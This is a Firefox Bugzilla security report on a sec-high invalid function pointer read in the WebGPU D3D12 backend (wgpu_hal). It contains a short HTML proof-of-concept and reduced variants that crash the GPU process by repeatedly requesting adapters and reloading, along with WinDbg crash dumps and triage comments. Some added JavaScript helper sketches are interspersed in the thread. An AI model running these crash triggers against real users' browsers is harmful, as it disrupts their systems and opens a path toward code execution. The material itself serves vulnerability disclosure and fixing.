WebGPU - Invalid function pointer in `wgpu_hal` in GPU Process using D3D on Windows
Categories
(Core :: Graphics: WebGPU, defect, P1)
Tracking
()
People
(Reporter: loobenyang, Assigned: ErichDonGubler)
References
Details
(Keywords: csectype-sandbox-escape, reporter-external, sec-high, Whiteboard: [fixed in wgpu#3936][reporter-external] [client-bounty-form] [verif?])
Attachments
(13 files)
VULNERABILITY DETAILS
A specially crafted HTML file can trigger an invalid function pointer read in the D3D backend of wgpu_hal. This bug could potentially be exploited to execute arbitrary code in the GPU process.
Open the PoC (InvalidFunPointer_wgpu_hal_PoC.html) in Firefox.
The PoC causes faulty interactions between Gecko and the D3D libraries, which ultimately lead to an invalid function pointer read under xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure.
The crash happens at the following instruction, which tries to read from the memory address in rax and store the result back into rax.
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????
The next instruction is a virtual function call:
0:096> u
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax]
00007ff9`f1257d9b ff15b73c1400 call qword ptr [D3D12Core!_guard_xfg_dispatch_icall_fptr (00007ff9`f139ba58)]
RAX would then hold the address to jump to, so the invalid memory access happens while reading a function pointer from an invalid memory location.
For this reason, this bug has the potential to be exploited to execute arbitrary code in the GPU process.
VERSION
Firefox 116.0a1 (2023-06-24) (64-bit)
OS Windows 11 Home 22H2 (Build 22621.1848)
REPRODUCTION CASE (InvalidFunPointer_wgpu_hal_PoC.html; if it does not reproduce after running for 10 seconds or so, try opening it in a new tab.)
<script>
navigator.gpu.requestAdapter().then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
Type of crash: gpu process
Crash State:
(1144.38ec): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????
0:096> r
rax=00007ffa3fe75000 rbx=000000000000f914 rcx=0000020fcdac62b0
rdx=000000209180cf30 rsi=0000020fcdac6880 rdi=0000000000000000
rip=00007ff9f1257d98 rsp=000000209180cb60 rbp=000000209180ce10
r8=000000209180d0d0 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ffa4f8b5108
r14=000000209180d0d0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010204
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????
0:096> dv
Unable to enumerate locals, Win32 error 0n87
Private symbols (symbols.pri) are required for locals.
Type ".hh dbgerr005" for details.
0:096> k
# Child-SP RetAddr Call Site
00 00000020`9180cb60 00007ff9`f1260d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 00000020`9180cb90 00007ff9`f12623d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 00000020`9180cdb0 00007ffa`4f8a6a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 00000020`9180ce30 00007ffa`4f8a668e d3d12!D3D12CreateDeviceImpl+0x5d
04 00000020`9180ce80 00007ff9`e86d3ee9 d3d12!D3D12CreateDevice+0xae
05 (Inline Function) --------`-------- xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure$0+0x218 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 113]
06 (Inline Function) --------`-------- xul!core::ops::function::impls::impl$3::call_mut+0x218 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\ops\function.rs @ 298]
07 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::find_map::check::closure$0+0x218 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2795]
08 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::try_fold+0x250 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2299]
09 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::find_map+0x250 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2801]
0a 00000020`9180cf00 00007ff9`e87087c0 xul!core::iter::adapters::filter_map::impl$2::next<wgpu_hal::ExposedAdapter<wgpu_hal::dx12::Api>,alloc::vec::into_iter::IntoIter<enum2$<d3d12::dxgi::DxgiAdapter>,alloc::alloc::Global>,wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure_env$0>+0x279 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\adapters\filter_map.rs @ 61]
0b (Inline Function) --------`-------- xul!alloc::vec::spec_from_iter_nested::impl$0::from_iter+0x8 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\spec_from_iter_nested.rs @ 26]
0c (Inline Function) --------`-------- xul!alloc::vec::in_place_collect::impl$1::from_iter+0x1f [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\in_place_collect.rs @ 167]
0d (Inline Function) --------`-------- xul!alloc::vec::impl$15::from_iter+0x1f [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\mod.rs @ 2724]
0e (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::collect+0x1f [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 1891]
0f 00000020`9180d290 00007ff9`e8094ec3 xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters+0x70 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 115]
10 00000020`9180d510 00007ff9`e667c064 xul!wgpu_bindings::server::wgpu_server_instance_request_adapter+0x383 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 158]
11 00000020`9180ecc0 00007ff9`e6686d8a xul!mozilla::webgpu::WebGPUParent::RecvInstanceRequestAdapter+0xb4 [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 295]
12 00000020`9180efb0 00007ff9`e5bece92 xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x394a [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 662]
13 00000020`9180f170 00007ff9`e4d9a200 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x172 [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 214]
14 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x71 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1811]
15 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchMessage+0x33c [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1736]
16 00000020`9180f220 00007ff9`e4b68b35 xul!mozilla::ipc::MessageChannel::RunMessage+0x440 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1536]
17 00000020`9180f590 00007ff9`e4ae5186 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x95 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1643]
18 00000020`9180f5e0 00007ff9`e4ae3d31 xul!nsThread::ProcessNextEvent+0x1096 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1194]
19 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 479]
1a 00000020`9180f980 00007ff9`e3c1e27f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x111 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300]
1b (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370]
1c 00000020`9180fa30 00007ff9`e325f6fe xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364]
1d 00000020`9180fa80 00007ff9`e3a67562 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 346]
1e 00000020`9180fae0 00007ffa`3c4e739d xul!nsThread::ThreadFunc+0xe2 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393]
1f 00000020`9180fcb0 00007ffa`3c569b31 nss3!_PR_NativeRunThread+0x13d [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421]
20 00000020`9180fd20 00007ffa`6b599363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140]
21 00000020`9180fd50 00007ffa`6b6a26ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
22 00000020`9180fd80 00007ffa`3c7b3bf8 KERNEL32!BaseThreadInitThunk+0x1d
23 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150]
24 00000020`9180fdb0 00007ffa`6d90a9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 617]
25 00000020`9180fe20 00000000`00000000 ntdll!RtlUserThreadStart+0x28
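As a quick sanity check on the crash state above, the register dump and the faulting instruction line can be compared mechanically. The sketch below is a hypothetical triage helper, not part of the original report: `parseRegisters` and `parseFaultAddress` are names made up for illustration, and the input strings are copied from the WinDbg output above. It confirms that the faulting `ds:` address is the value held in rax, and notes that this value is page-aligned.

```javascript
// Hypothetical triage helper (names are illustrative, not from the report).
// Parses the text of a WinDbg `r` register dump into a name -> BigInt map.
function parseRegisters(dump) {
  const regs = {};
  // Matches pairs such as "rax=00007ffa3fe75000" or "r8=000000209180d0d0".
  const pattern = /\b(r[a-z0-9]{1,2})=([0-9a-f]{16})\b/g;
  for (const [, name, value] of dump.matchAll(pattern)) {
    regs[name] = BigInt("0x" + value);
  }
  return regs;
}

// WinDbg prints the effective address as "ds:XXXXXXXX`XXXXXXXX=...".
function parseFaultAddress(instructionLine) {
  const match = /ds:([0-9a-f]{8})`([0-9a-f]{8})=/.exec(instructionLine);
  return match ? BigInt("0x" + match[1] + match[2]) : null;
}

// Input copied from the crash state in the report.
const registerDump = `
rax=00007ffa3fe75000 rbx=000000000000f914 rcx=0000020fcdac62b0
rdx=000000209180cf30 rsi=0000020fcdac6880 rdi=0000000000000000
rip=00007ff9f1257d98 rsp=000000209180cb60 rbp=000000209180ce10
`;
const faultLine =
  "00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????";

const regs = parseRegisters(registerDump);
const faultAddress = parseFaultAddress(faultLine);

// The unreadable address is exactly the pointer held in rax.
const faultIsRax = faultAddress === regs.rax;
// The low 12 bits are zero, i.e. the pointer sits on a 4 KiB page boundary.
const pageAligned = (regs.rax & 0xfffn) === 0n;
console.log({ faultIsRax, pageAligned });
```

The same two functions can be pointed at the later crash dumps in this bug to check whether the pattern (fault address equal to rax, low 12 bits zero) holds across runs.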
CREDIT INFORMATION
Reporter credit: Looben Yang
Assignee | ||
Comment 1•2 years ago
•
|
||
I am unable to reproduce this issue with any of the following Windows versions (using mozregression --launch 2023-06-24):
- 10.0.22000.2057
- 10.0.22000.2124 with Windows Feature Experience Pack 1000.22001.1000.0
…noting that my current hardware profile is:
- MB: ROG CROSSHAIR VIII HERO (WI-FI)
- Graphics Card: NVIDIA GeForce RTX 2060 SUPER
I see that OP is on the Windows 11 22H2 version track, while I'm on the 21H2 version track. I will try upgrading, and attempt to reproduce the issue again.
Assignee | ||
Comment 2•2 years ago
•
|
||
:loobenyang: I have not yet succeeded in reproducing this issue on Windows 10.0.22621.1848 (Windows OS version now matching the OP, though with the same hardware profile as my previous comment). Could you please give me more information about the hardware profile you're reproducing this on?
Comment 3•2 years ago
|
||
Could you also attach the output from about:support?
Assignee | ||
Comment 4•2 years ago
•
|
||
:loobenyang: In addition to :jimb's request (and my previous one 😅), another piece of information that might be important: what kind of build are you running? I see from the preformatted text block in the OP that you're running in WinDbg; are you using a debug build (as opposed to an optimized build)?
Assignee | ||
Comment 5•2 years ago
•
|
||
For my convenience later: I've been using ./mach mozregression --launch 2023-06-24 --pref dom.webgpu.wgpu-backend:dx12 -a http://…/InvalidFunPointer_wgpu_hal_PoC.html to test this.
Reporter | ||
Comment 6•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #4)
:loobenyang: In addition to :jimb's request (and my previous one 😅), another piece of information that might be important: what kind of build are you running? I see from the preformatted text block in the OP that you're running in WinDbg; are you using a debug build (as opposed to an optimized build)?
I was using an official nightly build.
When you cannot reproduce it in one run, have you tried closing the old tab and opening a new tab with the PoC?
Reporter | ||
Comment 7•2 years ago
|
||
I just reproduced it again and collected the about:support info in a PDF, aboutSupoprt.pdf.
The build I used was an official Firefox Nightly build, which is a release build.
Assignee | ||
Comment 8•2 years ago
|
||
:loobenyang: It's helpful to know that this reproduces in latest Firefox! I'm unfortunately not able to reproduce on the latest Firefox. In all of my reproductions, I have attempted to use the advice you reiterated with using multiple tabs.
I'm going to try another Windows machine I have that appears to have a similar hardware profile to the OP's: an integrated Intel GPU that uses Intel HD Graphics 630, and an NVIDIA GeForce GTX 1050 Ti. I have already gotten an access violation on it, but I do not know if it's the same as OP's. Will report back.
Assignee | ||
Comment 9•2 years ago
•
|
||
From the about:support dump in comment 7, OP is apparently reproducing on a graphics device with PCI vendor ID 0x8086 (Intel) and device ID 0x9BC4. This appears to be an Intel Comet Lake GT2, which uses Intel HD Graphics 630. 🤞🏻Hopefully, the Intel adapter I mentioned in my previous comment is similar enough that I'll get this same issue.
Based on the WebGL info in that same about:support dump, it seems that WebGPU's backend is actually foregoing selection of an NVIDIA device in the same hardware profile. This appears to be because we are requesting low-power devices from WGPU when GPURequestAdapterOptions.powerPreference is omitted; I've filed bug 1841840 to capture it as a separate issue from this one.
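For reference, the vendor half of a PCI ID pair like the one above can be decoded with a small lookup. This is only an illustrative sketch: `PCI_VENDORS` and `describeAdapter` are hypothetical names, the table covers just the three vendor IDs that appear in this bug, and it deliberately does not try to map device IDs to product names.

```javascript
// Hypothetical lookup table (not from about:support itself). Only the PCI
// vendor IDs that appear in this bug are listed.
const PCI_VENDORS = new Map([
  [0x8086, "Intel"],
  [0x10de, "NVIDIA"],
  [0x1414, "Microsoft"],
]);

// Formats a vendor/device ID pair in the same 0xNNNN style used in the thread.
function describeAdapter(vendorId, deviceId) {
  const vendor = PCI_VENDORS.get(vendorId) ?? "unknown vendor";
  const hex = (n) => "0x" + n.toString(16).toUpperCase().padStart(4, "0");
  return `${vendor} (vendor ${hex(vendorId)}, device ${hex(deviceId)})`;
}

console.log(describeAdapter(0x8086, 0x9bc4));
// prints "Intel (vendor 0x8086, device 0x9BC4)"
```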
Assignee | ||
Comment 10•2 years ago
|
||
:loobenyang: Idea: if you specify a power preference in adapter options, i.e., navigator.gpu.requestAdapter() becomes navigator.gpu.requestAdapter({ powerPreference: "high-performance" }) in the reproduction steps, does this issue still reproduce for you?
Reporter | ||
Comment 11•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #10)
:loobenyang: Idea: if you specify a power preference in adapter options, i.e., navigator.gpu.requestAdapter() becomes navigator.gpu.requestAdapter({ powerPreference: "high-performance" }) in the reproduction steps, does this issue still reproduce for you?
Yes, I can still reproduce it with this option:
<script>
navigator.gpu.requestAdapter({ powerPreference: "high-performance" }).then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
117.0a1 (2023-07-05) (64-bit)
(3950.3d80): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff8`1e0c7d98 488b00 mov rax,qword ptr [rax] ds:00007ff8`66ee5000=????????????????
0:061> g
(3950.3d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff8`1e0c7d98 488b00 mov rax,qword ptr [rax] ds:00007ff8`66ee5000=????????????????
0:061> r
rax=00007ff866ee5000 rbx=000000000000f700 rcx=000001b660306800
rdx=00000081ce63cef0 rsi=000001b660306dd0 rdi=0000000000000000
rip=00007ff81e0c7d98 rsp=00000081ce63cb20 rbp=00000081ce63cdd0
r8=00000081ce63d090 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ff867015108
r14=00000081ce63d090 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff8`1e0c7d98 488b00 mov rax,qword ptr [rax] ds:00007ff8`66ee5000=????????????????
0:061> dv
Unable to enumerate locals, Win32 error 0n87
Private symbols (symbols.pri) are required for locals.
Type ".hh dbgerr005" for details.
0:061> k
# Child-SP RetAddr Call Site
00 00000081`ce63cb20 00007ff8`1e0d0d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 00000081`ce63cb50 00007ff8`1e0d23d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 00000081`ce63cd70 00007ff8`67006a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 00000081`ce63cdf0 00007ff8`6700668e d3d12!D3D12CreateDeviceImpl+0x5d
04 00000081`ce63ce40 00007ff8`060282e9 d3d12!D3D12CreateDevice+0xae
05 00000081`ce63cec0 00007ff8`0605cbc0 xul!JOG_RegisterPing+0xa140f9
06 00000081`ce63d250 00007ff8`059e6283 xul!JOG_RegisterPing+0xa489d0
07 00000081`ce63d4d0 00007ff8`03fc6b64 xul!JOG_RegisterPing+0x3d2093
08 00000081`ce63ec80 00007ff8`03fd188a xul!VR_RuntimePath+0xa6ede4
09 00000081`ce63ef70 00007ff8`0352eaa2 xul!VR_RuntimePath+0xa79b0a
0a 00000081`ce63f130 00007ff8`026c2d00 xul!mozilla_dump_image+0xebc2
0b 00000081`ce63f1e0 00007ff8`024956f5 xul!GIFFT_TimingDistributionCancel+0x847690
0c 00000081`ce63f550 00007ff8`0240de76 xul!GIFFT_TimingDistributionCancel+0x61a085
0d 00000081`ce63f5a0 00007ff8`0240ca21 xul!GIFFT_TimingDistributionCancel+0x592806
0e 00000081`ce63f940 00007ff8`0153f49f xul!GIFFT_TimingDistributionCancel+0x5913b1
0f 00000081`ce63f9f0 00007ff8`00b7f73e xul!XRE_GetBootstrap+0x9dd20f
10 00000081`ce63fa40 00007ff8`01385622 xul!XRE_GetBootstrap+0x1d4ae
11 00000081`ce63faa0 00007ff8`3ed374ed xul!XRE_GetBootstrap+0x823392
12 00000081`ce63fc70 00007ff8`3edb9b71 nss3!sqlite3_create_function+0x57d
13 00000081`ce63fce0 00007ff8`89c19363 nss3!PR_MD_INIT_LOCKS+0x71
14 00000081`ce63fd10 00007ff8`8ad926ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
15 00000081`ce63fd40 00007ff8`5a38deb8 KERNEL32!BaseThreadInitThunk+0x1d
16 00000081`ce63fd70 00007ff8`8c12a9f8 mozglue!blink::Decimal::toString+0x888
17 00000081`ce63fde0 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Reporter | ||
Comment 12•2 years ago
|
||
Assignee | ||
Comment 13•2 years ago
|
||
FTR: This issue seems very similar to a (closed, but unresolved) report by an old coworker of mine against WGPU upstream (wgpu #3485).
Assignee | ||
Comment 14•2 years ago
|
||
☝🏻In the bug report mentioned by my previous comment, only enumerating adapters multiple times caused a similar issue in some environments. :loobenyang, are you able to reproduce this issue if you only request adapters, but not devices? Concretely, the JS snippet would be:
navigator.gpu.requestAdapter().then((_adapter)=>{ setTimeout(function(){location.reload();},200); })
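The three PoC variants tried so far in this bug (the original, the one with a power preference, and the adapter-only one above) differ only in two knobs, so they can be expressed as one parameterized function. This is a readability sketch rather than the reporter's actual test page: `runVariant` is a hypothetical name, and the `gpu`, `reload`, and `schedule` parameters are injected stand-ins for `navigator.gpu`, `location.reload`, and `setTimeout` so the logic can also be exercised outside a browser. Unlike the one-line PoC, it skips `requestDevice()` instead of throwing when no adapter is returned.

```javascript
// Hypothetical helper covering the PoC variants discussed in this bug.
// `gpu`, `reload`, and `schedule` are injected: in a page they would be
// navigator.gpu, () => location.reload(), and setTimeout respectively.
async function runVariant(gpu, variant, reload, schedule = setTimeout) {
  const { powerPreference, requestDevice = true } = variant;
  // Omit the options object entirely when no power preference is given,
  // matching the original navigator.gpu.requestAdapter() call.
  const options = powerPreference ? { powerPreference } : undefined;
  const adapter = await gpu.requestAdapter(options);
  // Assumption: a null adapter is skipped rather than treated as an error.
  if (adapter && requestDevice) {
    await adapter.requestDevice();
  }
  // Same 200 ms reload delay as the PoC.
  schedule(reload, 200);
  return adapter;
}

// In a page, the adapter-only variant would be started like this:
// runVariant(navigator.gpu, { requestDevice: false }, () => location.reload());
```

Passing `{}` reproduces the original PoC, `{ powerPreference: "high-performance" }` the variant from comment 10, and `{ requestDevice: false }` the adapter-only variant.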
Reporter | ||
Comment 15•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #14)
☝🏻In the bug report mentioned by my previous comment, only enumerating adapters multiple times caused a similar issue in some environments. :loobenyang, are you able to reproduce this issue if you only request adapters, but not devices? Concretely, the JS snippet would be:
navigator.gpu.requestAdapter().then((_adapter)=>{ setTimeout(function(){location.reload();},200); })
I just tried. And yes I reproduced it after removing the requestDevice() call:
<script>
navigator.gpu.requestAdapter().then((adapter)=>{ setTimeout(function(){location.reload();},200); ;});
</script>
117.0a1 (2023-07-06) (64-bit)
(33ac.2920): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`60b27d98 488b00 mov rax,qword ptr [rax] ds:00007ff9`78cd5000=????????????????
0:096> r
rax=00007ff978cd5000 rbx=000000000000f91e rcx=00000206923c9fd0
rdx=000000ca0a76cce0 rsi=00000206923ca5a0 rdi=0000000000000000
rip=00007ff960b27d98 rsp=000000ca0a76c910 rbp=000000ca0a76cbc0
r8=000000ca0a76ce80 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ff9944b5108
r14=000000ca0a76ce80 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`60b27d98 488b00 mov rax,qword ptr [rax] ds:00007ff9`78cd5000=????????????????
0:096> dv
Unable to enumerate locals, Win32 error 0n87
Private symbols (symbols.pri) are required for locals.
Type ".hh dbgerr005" for details.
0:096> k
# Child-SP RetAddr Call Site
00 000000ca`0a76c910 00007ff9`60b30d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 000000ca`0a76c940 00007ff9`60b323d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 000000ca`0a76cb60 00007ff9`944a6a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 000000ca`0a76cbe0 00007ff9`944a668e d3d12!D3D12CreateDeviceImpl+0x5d
04 000000ca`0a76cc30 00007ff9`1f50aa19 d3d12!D3D12CreateDevice+0xae
05 000000ca`0a76ccb0 00007ff9`1f53f2f0 xul!JOG_RegisterPing+0xa12279
06 000000ca`0a76d040 00007ff9`1eec9ff3 xul!JOG_RegisterPing+0xa46b50
07 000000ca`0a76d2c0 00007ff9`1d4ac864 xul!JOG_RegisterPing+0x3d1853
08 000000ca`0a76ea70 00007ff9`1d4b758a xul!VR_RuntimePath+0xa6efe4
09 000000ca`0a76ed60 00007ff9`1ca145a2 xul!VR_RuntimePath+0xa79d0a
0a 000000ca`0a76ef20 00007ff9`1bbba410 xul!mozilla_dump_image+0xebc2
0b 000000ca`0a76efd0 00007ff9`1b98f025 xul!GIFFT_TimingDistributionCancel+0x857ef0
0c 000000ca`0a76f340 00007ff9`1b90b1bf xul!GIFFT_TimingDistributionCancel+0x62cb05
0d 000000ca`0a76f390 00007ff9`1b909e21 xul!GIFFT_TimingDistributionCancel+0x5a8c9f
0e 000000ca`0a76f730 00007ff9`1aa0b74f xul!GIFFT_TimingDistributionCancel+0x5a7901
0f 000000ca`0a76f7e0 00007ff9`1a03f81e xul!XRE_GetBootstrap+0x9e94bf
10 000000ca`0a76f830 00007ff9`1a84d652 xul!XRE_GetBootstrap+0x1d58e
11 000000ca`0a76f890 00007ff9`678273ad xul!XRE_GetBootstrap+0x82b3c2
12 000000ca`0a76fa60 00007ff9`678a9df1 nss3!sqlite3_create_function+0x57d
13 000000ca`0a76fad0 00007ff9`a8409363 nss3!PR_MD_INIT_LOCKS+0x71
14 000000ca`0a76fb00 00007ff9`a8c426ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
15 000000ca`0a76fb30 00007ff9`74d333a8 KERNEL32!BaseThreadInitThunk+0x1d
16 000000ca`0a76fb60 00007ff9`aae4a9f8 mozglue!blink::Decimal::toString+0x888
17 000000ca`0a76fbd0 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Reporter | ||
Comment 16•2 years ago
|
||
Assignee | ||
Comment 17•2 years ago
•
|
||
:loobenyang: Great, thank you! That's very informative. My suspicion that this has the same root cause as wgpu #3485 has increased greatly. I think the most effective next step here will be to run the reproducible example there (in Rust) to see if we get a similar crash. If we do get one, then we can eliminate the vast majority of the Firefox layers that are suspect in this investigation. CC :jgilbert, :jimb, :teoxoy.
To test my hypothesis, we will need to run a binary on your machine. I've attached a ZIP file containing Rust source code (wgpu-3485-mvre.zip) with which you can compile such a binary. This has had its Cargo.toml updated to use the latest wgpu, which is 0.16.1 at time of writing. You may use Rust's cargo tool (which I find most convenient to install with rustup) to produce the same artifact, i.e., using cargo build and/or cargo run.
For convenience, you might first try using the compiled artifacts already uploaded in wgpu #3485's OP:
…but if you do get a similar crash with the binaries uploaded to the wgpu issue, it would be best to also attempt to reproduce the crash with the latest wgpu from the source I've provided.
Reporter | ||
Comment 18•2 years ago
|
||
I ran the binary wgpu-test.exe many times but did not see anything abnormal. Result of the binary:
Test A:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "NVIDIA",
driver_info: "517.00",
backend: Vulkan,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "Intel Corporation",
driver_info: "Intel driver",
backend: Vulkan,
}
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test B:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Assignee | ||
Comment 19•2 years ago
|
||
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old wgpu-test binary, running the code I provided) negative?
Assignee | ||
Comment 20•2 years ago
|
||
Assignee | ||
Comment 21•2 years ago
|
||
Assignee | ||
Comment 22•2 years ago
|
||
Assignee | ||
Comment 23•2 years ago
|
||
At this point, I think our next best step is to try lots of different things, and see where this bug still reproduces. 😅 I have multiple ideas from brainstorming sessions with coworkers, and they shouldn't be hard to test, but keeping track of individual experiments and questions is probably going to be challenging. I'll post them as separate comments, so they're hopefully easier to address.
Assignee | ||
Comment 24•2 years ago
|
||
- ASAN builds in Firefox might help us detect the same problem by (intentionally) crashing at an earlier point in execution. You can retrieve ASan-enabled 64-bit Windows builds of Firefox Desktop at http://archive.mozilla.org/pub/firefox/nightly/latest-mozilla-central/firefox-117.0a1.en-US.win64-asan-reporter.zip. :loobenyang, could you please try reproducing this in the latest nightly ASan reporter build?
Assignee | ||
Comment 25•2 years ago
|
||
